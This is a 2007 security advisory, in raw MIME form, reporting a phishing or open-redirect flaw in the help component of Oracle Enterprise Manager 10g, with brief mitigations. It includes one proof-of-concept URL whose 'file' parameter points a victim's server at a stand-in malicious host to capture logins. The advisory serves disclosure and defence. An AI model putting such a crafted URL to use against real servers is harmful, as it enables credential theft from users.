------=_Part_245915_32631201.1174835973515 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Product: Oracle Entreprise manager Vulnerabilities: Phishing Level: Medium By: Handrix 25 March 2007 MorX security research team www.morx.org The oracle entreprise manager are vulnerable to phishing attack in help rubric, an attacker can redirect your login and password to an another malicious website. Any way feel free to verify the whole login page contenent before making your sensible information on. Other solution deactivate the help link Simple request : http://www.victimeserver.com:5500/em/console/help/fr/topic?inOHW=false&linkHelp=false&file=http://www.maliciousserver.dot:5500/em/console/ Version: Oracle entreprise manager 10g May be others ------=_Part_245915_32631201.1174835973515 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Product: Oracle Entreprise manager
Vulnerabilities: Phishing
Level: Medium
By: Handrix <handrix_at_morx_org>
25 March 2007
MorX security research team
www.morx.org

The oracle entreprise manager are vulnerable to phishing attack in help rubric,
an attacker can redirect your login and password to an another malicious website.
Any way feel free to verify the whole login page contenent before making your sensible information on.

Other solution deactivate the help link

Simple request :
http://www.victimeserver.com:5500/em/console/help/fr/topic?inOHW=false&linkHelp=false&file=http://www.maliciousserver.dot:5500/em/console/


Version: Oracle entreprise manager 10g
May be others
------=_Part_245915_32631201.1174835973515--